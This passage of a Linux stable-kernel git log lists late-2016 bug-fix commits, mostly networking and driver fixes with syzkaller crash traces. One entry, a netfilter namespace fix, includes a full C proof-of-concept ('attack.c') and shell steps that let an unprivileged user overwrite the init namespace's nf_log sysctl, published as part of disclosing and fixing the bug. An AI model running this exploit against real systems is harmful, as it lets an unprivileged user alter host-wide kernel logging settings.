Eric Dumazet [Thu, 3 Nov 2016 03:30:48 +0000 (20:30 -0700)]
ipv6: dccp: fix out of bound access in dccp_v6_err()

[ Upstream commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 ]

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodccp: fix out of bound access in dccp_v4_err()
Eric Dumazet [Thu, 3 Nov 2016 02:00:40 +0000 (19:00 -0700)]
dccp: fix out of bound access in dccp_v4_err()

[ Upstream commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 ]

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodccp: do not send reset to already closed sockets
Eric Dumazet [Thu, 3 Nov 2016 01:04:24 +0000 (18:04 -0700)]
dccp: do not send reset to already closed sockets

[ Upstream commit 346da62cc186c4b4b1ac59f87f4482b47a047388 ]

Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
 [<     inline     >] exit_task_work include/linux/task_work.h:21
 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
 [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e63
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodccp: do not release listeners too soon
Eric Dumazet [Thu, 3 Nov 2016 00:14:41 +0000 (17:14 -0700)]
dccp: do not release listeners too soon

[ Upstream commit c3f24cfb3e508c70c26ee8569d537c8ca67a36c6 ]

Andrey Konovalov reported following error while fuzzing with syzkaller :

IPv4: Attempt to release alive inet socket ffff880068e98940
kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 1 PID: 3905 Comm: a.out Not tainted 4.9.0-rc3+ #333
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88006b9e0000 task.stack: ffff880068770000
RIP: 0010:[<ffffffff819ead5f>]  [<ffffffff819ead5f>]
selinux_socket_sock_rcv_skb+0xff/0x6a0 security/selinux/hooks.c:4639
RSP: 0018:ffff8800687771c8  EFLAGS: 00010202
RAX: ffff88006b9e0000 RBX: 1ffff1000d0eee3f RCX: 1ffff1000d1d312a
RDX: 1ffff1000d1d31a6 RSI: dffffc0000000000 RDI: 0000000000000010
RBP: ffff880068777360 R08: 0000000000000000 R09: 0000000000000002
R10: dffffc0000000000 R11: 0000000000000006 R12: ffff880068e98940
R13: 0000000000000002 R14: ffff880068777338 R15: 0000000000000000
FS:  00007f00ff760700(0000) GS:ffff88006cd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020008000 CR3: 000000006a308000 CR4: 00000000000006e0
Stack:
 ffff8800687771e0 ffffffff812508a5 ffff8800686f3168 0000000000000007
 ffff88006ac8cdfc ffff8800665ea500 0000000041b58ab3 ffffffff847b5480
 ffffffff819eac60 ffff88006b9e0860 ffff88006b9e0868 ffff88006b9e07f0
Call Trace:
 [<ffffffff819c8dd5>] security_sock_rcv_skb+0x75/0xb0 security/security.c:1317
 [<ffffffff82c2a9e7>] sk_filter_trim_cap+0x67/0x10e0 net/core/filter.c:81
 [<ffffffff82b81e60>] __sk_receive_skb+0x30/0xa00 net/core/sock.c:460
 [<ffffffff838bbf12>] dccp_v4_rcv+0xdb2/0x1910 net/dccp/ipv4.c:873
 [<ffffffff83069d22>] ip_local_deliver_finish+0x332/0xad0
net/ipv4/ip_input.c:216
 [<     inline     >] NF_HOOK_THRESH ./include/linux/netfilter.h:232
 [<     inline     >] NF_HOOK ./include/linux/netfilter.h:255
 [<ffffffff8306abd2>] ip_local_deliver+0x1c2/0x4b0 net/ipv4/ip_input.c:257
 [<     inline     >] dst_input ./include/net/dst.h:507
 [<ffffffff83068500>] ip_rcv_finish+0x750/0x1c40 net/ipv4/ip_input.c:396
 [<     inline     >] NF_HOOK_THRESH ./include/linux/netfilter.h:232
 [<     inline     >] NF_HOOK ./include/linux/netfilter.h:255
 [<ffffffff8306b82f>] ip_rcv+0x96f/0x12f0 net/ipv4/ip_input.c:487
 [<ffffffff82bd9fb7>] __netif_receive_skb_core+0x1897/0x2a50 net/core/dev.c:4213
 [<ffffffff82bdb19a>] __netif_receive_skb+0x2a/0x170 net/core/dev.c:4251
 [<ffffffff82bdb493>] netif_receive_skb_internal+0x1b3/0x390 net/core/dev.c:4279
 [<ffffffff82bdb6b8>] netif_receive_skb+0x48/0x250 net/core/dev.c:4303
 [<ffffffff8241fc75>] tun_get_user+0xbd5/0x28a0 drivers/net/tun.c:1308
 [<ffffffff82421b5a>] tun_chr_write_iter+0xda/0x190 drivers/net/tun.c:1332
 [<     inline     >] new_sync_write fs/read_write.c:499
 [<ffffffff8151bd44>] __vfs_write+0x334/0x570 fs/read_write.c:512
 [<ffffffff8151f85b>] vfs_write+0x17b/0x500 fs/read_write.c:560
 [<     inline     >] SYSC_write fs/read_write.c:607
 [<ffffffff81523184>] SyS_write+0xd4/0x1a0 fs/read_write.c:599
 [<ffffffff83fc02c1>] entry_SYSCALL_64_fastpath+0x1f/0xc2

It turns out DCCP calls __sk_receive_skb(), and this broke when
lookups no longer took a reference on listeners.

Fix this issue by adding a @refcounted parameter to __sk_receive_skb(),
so that sock_put() is used only when needed.

Fixes: 3b24d854cb35 ("tcp/dccp: do not touch listener sk_refcnt under synflood")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agotcp: fix return value for partial writes
Eric Dumazet [Wed, 2 Nov 2016 21:41:50 +0000 (14:41 -0700)]
tcp: fix return value for partial writes

[ Upstream commit 79d8665b9545e128637c51cf7febde9c493b6481 ]

After my commit, tcp_sendmsg() might restart its loop after
processing socket backlog.

If sk_err is set, we blindly return an error, even though we
copied data to user space before.

We should instead return number of bytes that could be copied,
otherwise user space might resend data and corrupt the stream.

This might happen if another thread is using recvmsg(MSG_ERRQUEUE)
to process timestamps.

Issue was diagnosed by Soheil and Willem, big kudos to them !

Fixes: d41a69f1d390f ("tcp: make tcp_sendmsg() aware of socket backlog")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Cc: Soheil Hassas Yeganeh <soheil@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Tested-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoipv4: allow local fragmentation in ip_finish_output_gso()
Lance Richardson [Wed, 2 Nov 2016 20:36:17 +0000 (16:36 -0400)]
ipv4: allow local fragmentation in ip_finish_output_gso()

[ Upstream commit 9ee6c5dc816aa8256257f2cd4008a9291ec7e985 ]

Some configurations (e.g. geneve interface with default
MTU of 1500 over an ethernet interface with 1500 MTU) result
in the transmission of packets that exceed the configured MTU.
While this should be considered to be a "bad" configuration,
it is still allowed and should not result in the sending
of packets that exceed the configured MTU.

Fix by dropping the assumption in ip_finish_output_gso() that
locally originated gso packets will never need fragmentation.
Basic testing using iperf (observing CPU usage and bandwidth)
have shown no measurable performance impact for traffic not
requiring fragmentation.

Fixes: c7ba65d7b649 ("net: ip: push gso skb forwarding handling down the stack")
Reported-by: Jan Tluka <jtluka@redhat.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agotcp: fix potential memory corruption
Eric Dumazet [Wed, 2 Nov 2016 14:53:17 +0000 (07:53 -0700)]
tcp: fix potential memory corruption

[ Upstream commit ac9e70b17ecd7c6e933ff2eaf7ab37429e71bf4d ]

Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.

Then max_skb_frags is lowered to 14 or smaller value.

tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.

Fixes: 5f74f82ea34c ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
Eli Cooper [Tue, 1 Nov 2016 15:45:12 +0000 (23:45 +0800)]
ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()

[ Upstream commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 ]

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agobgmac: stop clearing DMA receive control register right after it is set
Andy Gospodarek [Mon, 31 Oct 2016 17:32:03 +0000 (13:32 -0400)]
bgmac: stop clearing DMA receive control register right after it is set

[ Upstream commit fcdefccac976ee51dd6071832b842d8fb41c479c ]

Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today.  I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.

On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.

This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.

Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde1f29 ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: mangle zero checksum in skb_checksum_help()
Eric Dumazet [Sat, 29 Oct 2016 18:02:36 +0000 (11:02 -0700)]
net: mangle zero checksum in skb_checksum_help()

[ Upstream commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 ]

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonet: clear sk_err_soft in sk_clone_lock()
Eric Dumazet [Fri, 28 Oct 2016 20:40:24 +0000 (13:40 -0700)]
net: clear sk_err_soft in sk_clone_lock()

[ Upstream commit e551c32d57c88923f99f8f010e89ca7ed0735e83 ]

At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodctcp: avoid bogus doubling of cwnd after loss
Florian Westphal [Fri, 28 Oct 2016 16:43:11 +0000 (18:43 +0200)]
dctcp: avoid bogus doubling of cwnd after loss

[ Upstream commit ce6dd23329b1ee6a794acf5f7e40f8e89b8317ee ]

If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to

   tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);

... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.

This can cause severe growth of cwnd (eventually overflowing u32).

Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.

Fixes: e3118e8359bb7c ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoLinux 4.8.9 v4.8.9
Greg Kroah-Hartman [Fri, 18 Nov 2016 09:57:55 +0000 (10:57 +0100)]
Linux 4.8.9

7 years agonetfilter: fix namespace handling in nf_log_proc_dostring
Jann Horn [Sun, 18 Sep 2016 19:40:55 +0000 (21:40 +0200)]
netfilter: fix namespace handling in nf_log_proc_dostring

commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/i915: Fix mismatched INIT power domain disabling during suspend
Imre Deak [Thu, 13 Oct 2016 11:34:06 +0000 (14:34 +0300)]
drm/i915: Fix mismatched INIT power domain disabling during suspend

commit fd58753ead86ee289ea89fe26e1842f36e54b36c upstream.

Currently the display INIT power domain disabling/enabling happens in a
mismatched way in the suspend/resume_early hooks respectively. This can
leave display power wells incorrectly disabled in the resume hook if the
suspend sequence is aborted for some reason resulting in the
suspend/resume hooks getting called but the suspend_late/resume_early
hooks being skipped. In particular this change fixes "Unclaimed read
from register 0x1e1204" on BYT/BSW triggered from i915_drm_resume()->
intel_pps_unlock_regs_wa() when suspending with /sys/power/pm_test set
to devices.

Fixes: 85e90679335f ("drm/i915: disable power wells on suspend")
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: David Weinehall <david.weinehall@intel.com>
Signed-off-by: Imre Deak <imre.deak@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476358446-11621-1-git-send-email-imre.deak@intel.com
(cherry picked from commit 4c494a5769cd0de92638b25960ba0158c36088a6)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amdgpu: fix a vm_flush fence leak
Grazvydas Ignotas [Sun, 23 Oct 2016 18:31:45 +0000 (21:31 +0300)]
drm/amdgpu: fix a vm_flush fence leak

commit 2d7c17be00e0dce3bc1a092a2c277a9f86c69ca9 upstream.

Looks like .last_flush reference is left at teardown.
Leak reported by CONFIG_SLUB_DEBUG.

Fixes: 41d9eb2c5a2a ("drm/amdgpu: add a fence after the VM flush")
Reviewed-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agodrm/amdgpu: fix fence slab teardown
Grazvydas Ignotas [Sun, 23 Oct 2016 18:31:43 +0000 (21:31 +0300)]
drm/amdgpu: fix fence slab teardown

commit 0f10425e811355986907c54f7d1d06703e406092 upstream.

To free fences, call_rcu() is used, which calls amdgpu_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so amdgpu_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.

Fix it with a rcu_barrier().

Fixes: b44135351a3a ("drm/amdgpu: RCU protected amdgpu_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoNFSv4.1: work around -Wmaybe-uninitialized warning
Arnd Bergmann [Mon, 17 Oct 2016 22:05:35 +0000 (00:05 +0200)]
NFSv4.1: work around -Wmaybe-uninitialized warning

commit 68a564006a21ae59c7c51b4359e2e8efa42ae4af upstream.

A bugfix introduced a harmless gcc warning in nfs4_slot_seqid_in_use
if we enable -Wmaybe-uninitialized again:

fs/nfs/nfs4session.c:203:54: error: 'cur_seq' may be used uninitialized in this function [-Werror=maybe-uninitialized]

gcc is not smart enough to conclude that the IS_ERR/PTR_ERR pair
results in a nonzero return value here. Using PTR_ERR_OR_ZERO()
instead makes this clear to the compiler.

The warning originally did not appear in v4.8 as it was globally
disabled, but the bugfix that introduced the warning got backported
to stable kernels which again enable it, and this is now the only
warning in the v4.7 builds.

Fixes: e09c978aae5b ("NFSv4.1: Fix Oopsable condition in server callback races")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agolibceph: fix legacy layout decode with pool 0
Yan, Zheng [Wed, 9 Nov 2016 08:42:48 +0000 (16:42 +0800)]
libceph: fix legacy layout decode with pool 0

commit 3890dce1d3a8b9fe3bc36de99496792e468cd079 upstream.

If your data pool was pool 0, ceph_file_layout_from_legacy()
transform that to -1 unconditionally, which broke upgrades.
We only want do that for a fully zeroed ceph_file_layout,
so that it still maps to a file_layout_t.  If any fields
are set, though, we trust the fl_pgpool to be a valid pool.

Fixes: 7627151ea30bc ("libceph: define new ceph_file_layout structure")
Link: http://tracker.ceph.com/issues/17825
Signed-off-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agomemcg: prevent memcg caches to be both OFF_SLAB & OBJFREELIST_SLAB
Greg Thelen [Thu, 10 Nov 2016 18:46:41 +0000 (10:46 -0800)]
memcg: prevent memcg caches to be both OFF_SLAB & OBJFREELIST_SLAB

commit f773e36de3d77c4000ca914c9d146f55f2fd51e8 upstream.

While testing OBJFREELIST_SLAB integration with pagealloc, we found a
bug where kmem_cache(sys) would be created with both CFLGS_OFF_SLAB &
CFLGS_OBJFREELIST_SLAB.  When it happened, critical allocations needed
for loading drivers or creating new caches will fail.

The original kmem_cache is created early making OFF_SLAB not possible.
When kmem_cache(sys) is created, OFF_SLAB is possible and if pagealloc
is enabled it will try to enable it first under certain conditions.
Given kmem_cache(sys) reuses the original flag, you can have both flags
at the same time resulting in allocation failures and odd behaviors.

This fix discards allocator specific flags from memcg before calling
create_cache.

The bug exists since 4.6-rc1 and affects testing debug pagealloc
configurations.

Fixes: b03a017bebc4 ("mm/slab: introduce new slab management type, OBJFREELIST_SLAB")
Link: http://lkml.kernel.org/r/1478553075-120242-1-git-send-email-thgarnie@google.com
Signed-off-by: Greg Thelen <gthelen@google.com>
Signed-off-by: Thomas Garnier <thgarnie@google.com>
Tested-by: Thomas Garnier <thgarnie@google.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Pekka Enberg <penberg@kernel.org>
Cc: David Rientjes <rientjes@google.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agommc: mxs: Initialize the spinlock prior to using it
Fabio Estevam [Sat, 5 Nov 2016 19:45:07 +0000 (17:45 -0200)]
mmc: mxs: Initialize the spinlock prior to using it

commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agopinctrl: iproc: Fix iProc and NSP GPIO support
Ray Jui [Tue, 18 Oct 2016 01:41:41 +0000 (18:41 -0700)]
pinctrl: iproc: Fix iProc and NSP GPIO support

commit 091c531b09c151c2d712a8f347009ca3698a2467 upstream.

Since commit 44a7185c2ae6 ("of/platform: Add common method to populate
default bus"), ARM64 platform devices are populated at the
arch_initcall_sync level; as a result, the platform_driver_probe calls
in both the iProc and NSP GPIO drivers fail with -ENODEV since by that
time the platform device was not yet registered.

Replace platform_driver_probe with platform_driver_register, that allow
the device to be register later

Fixes: 44a7185c2ae6 ("of/platform: Add common method to populate default bus")
Signed-off-by: Ray Jui <ray.jui@broadcom.com>
Tested-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoASoC: sun4i-codec: return error code instead of NULL when create_card fails
Chen-Yu Tsai [Mon, 31 Oct 2016 06:42:09 +0000 (14:42 +0800)]
ASoC: sun4i-codec: return error code instead of NULL when create_card fails

commit 85915b63ad8b796848f431b66c9ba5e356e722e5 upstream.

When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.

Make the create_card function pass back a meaningful error code, and
assign it to the return value.

Fixes: 45fb6b6f2aa3 ("ASoC: sunxi: add support for the on-chip codec on
      early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoASoC: Intel: Skylake: Always acquire runtime pm ref on unload
Lukas Wunner [Thu, 20 Oct 2016 10:26:16 +0000 (12:26 +0200)]
ASoC: Intel: Skylake: Always acquire runtime pm ref on unload

commit 6d13f62d931ba638e54ba56f3a7dd3080ffb485a upstream.

skl_probe() releases a runtime pm ref unconditionally wheras
skl_remove() acquires one only if the device is wakeup capable.
Thus if the device is not wakeup capable, unloading and reloading
the module will result in the refcount being decreased below 0.
Fix it.

Fixes: d8c2dab8381d ("ASoC: Intel: Add Skylake HDA audio driver")
Signed-off-by: Lukas Wunner <lukas@wunner.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agogpio: of: fix GPIO drivers with multiple gpio_chip for a single node
Masahiro Yamada [Tue, 25 Oct 2016 01:47:44 +0000 (10:47 +0900)]
gpio: of: fix GPIO drivers with multiple gpio_chip for a single node

commit c7e9d39831a31682285cc31ddf7dd06c0fe59138 upstream.

